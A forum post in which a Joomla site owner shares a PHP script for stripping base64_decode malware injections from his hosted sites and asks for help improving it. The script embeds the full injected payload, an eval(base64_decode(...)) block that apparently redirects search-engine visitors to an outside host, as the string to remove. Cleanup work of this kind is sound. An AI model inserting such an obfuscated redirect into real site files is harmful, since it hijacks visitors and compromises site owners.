RandyPetersen

ya, I see the humor in that. Of course the root of the problem is being figured out and resolved. This is just a stop-gap until it's resolved. Search for base64_decode hacks and you'll see its a common problem. All FTPs were changed after the first attack, and I was attacked again. I think it may be one of the 20 websites that I have under the account. Either they installed a bad component or they hacked a password. Either way, this will allow me some time as I try to resolve the problem. I am also planning on upgrading them to the latest version of joomla and components they use, but that will take time, this script has been a lifesaver.

I found this PHP script that checks the site and removes base64_decode based hacks. I had/have some problems with these hacks as of late. My hosting provider is working to remedy this, but this script worked awesome. First time about a week ago(I didn't have this script), I had to downloaded all my files and ran a script here to clean the files and re-uploaded them. It took forever, but this sctipt made quick work of it when I was infected with a different code the second time. I was just thinking about tweaking it a bit to help me find the next attack and for anyone else in the future. I am not a PHP coder, but have modified it a bit for my use. It was detecting some files that I had that were empty and reporting that it couldn't check the files. I put the filesize>0 conditional statement in there to remedy that. This is newbie stuff I am sure, so maybe someone would like to help out and make something useful. List of improvements would be: * Exclude the file in which this script is contained. * Set up an Array or a separate file of known base64_decode redirect code. * On files in which it contains a "base64_decode" command but none of the known exploits, display the next few lines of the file after the base64_decode command to see if a new exploit is being introduced. <html><head><title>Find String</title></head><body> <div style="width:500px; margin:20px; padding:20px; background:#ccc; border:#2d2d2d 1px solid;"> <p> This is currently locating the infected string </br> All strings that match will be removed automatically for you. </br> Credit : http://www.tahapaksu.com </p> <p> Refresh the page after the script is done, </br> There might be some files left, but those are not </br> infected by this particular decode causing redirect to </br> costabrava.bee.pl </p> <p>Above edit by criticalpixel.com </p> </div> <?php // ini_set('max_execution_time', '0'); // ini_set('set_time_limit', '0'); find_files('.'); function find_files($seed) { if(! is_dir($seed)) return false; $files = array(); $dirs = array($seed); while(NULL !== ($dir = array_pop($dirs))) { if($dh = opendir($dir)) { while( false !== ($file = readdir($dh))) { if($file == '.' || $file == '..') continue; $path = $dir . '/' . $file; if(is_dir($path)) { $dirs[] = $path; } else { if(preg_match('/^.*\.(php[\d]?|js|txt)$/i', $path)) { check_files($path); }} } closedir($dh); } } } function check_files($this_file) { $str_to_find='base64_decode("'; // the string(code/text) to search for if(!($content = file_get_contents($this_file))) { if(filesize($this_file)>0 ) { echo("<p>Could not check $this_file</p>\n"); } else { } } else { if(stristr($content, $str_to_find)) { echo("<p>$this_file -> contains $str_to_find</p>\n"); $str_to_replace='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHBpc3R3LjRwdS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));'; $content = str_replace($str_to_replace,"",$content); file_put_contents($this_file,$content); }} unset($content); } ?> </body></html> What are your thoughts? Is it worth it? What would be a command to find the filename of the current file running the script? Setup a file with several lines or just set up an array? Show just a few lines of a file? Thanks, Randy